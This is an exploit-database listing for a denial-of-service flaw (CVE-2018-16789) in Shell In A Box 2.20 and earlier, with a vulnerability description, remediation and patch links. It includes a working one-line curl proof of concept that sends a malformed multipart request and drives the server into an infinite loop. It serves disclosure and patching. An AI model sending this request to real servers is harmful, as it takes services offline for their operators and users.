Lucene search
Imre Rad1337DAY-ID-31444HistoryOct 28, 2018 - 12:00 a.m.
Shell In A Box 2.2.0 Denial Of Service Exploit
2018-10-2800:00:00
Imre Rad
0day.today
367
0.003 Low
EPSS
Percentile
71.3%
Exploit for linux platform in category dos / poc
Product: Shell In A Box (aka shellinabox, shellinaboxd)
"Shell In A Box implements a web server that can export arbitrary command
line tools to a web based terminal emulator. This emulator is accessible to
any JavaScript and CSS enabled web browser and does not require any
additional browser plugins. "
Most official-ish site: https://github.com/shellinabox/shellinabox
Vulnerability description:
The multipart/form-data parser function in the built-in webserver of Shell
In A Box enters an infinite loop in case of malformed request payload, the
server stops serving new requests and the the process eats up 100% of CPU
time.
Exploitation:
curl -v --header "Content-type: multipart/form-data;
boundary=------------------------8d14c0216fd84557" -d "impeachment"
http://127.0.0.1:4200/s/
Affected Shell In A Box versions:
2.20 and below
Remediation:
Upgrade to 2.21
Package available in Debian sid:
https://packages.debian.org/source/sid/shellinabox
Patch: https://github.com/shellinabox/shellinabox/pull/446
# 0day.today [2018-10-28] #Related
ubuntucve
ubuntucve
CVE-2018-16789
2019-03-21 00:00:00
nvd
nvd
CVE-2018-16789
2019-03-21 16:00:22
cvelist
cvelist
CVE-2018-16789
2019-03-17 18:36:51
prion
prion
Design/Logic Flaw
2019-03-21 16:00:00
cve
cve
CVE-2018-16789
2019-03-21 16:00:22
osv
osv
CVE-2018-16789
2019-03-21 16:00:22
debiancve
debiancve
CVE-2018-16789
2019-03-21 16:00:22
packetstorm
packetstorm
Shell In A Box 2.2.0 Denial Of Service
2018-10-27 00:00:00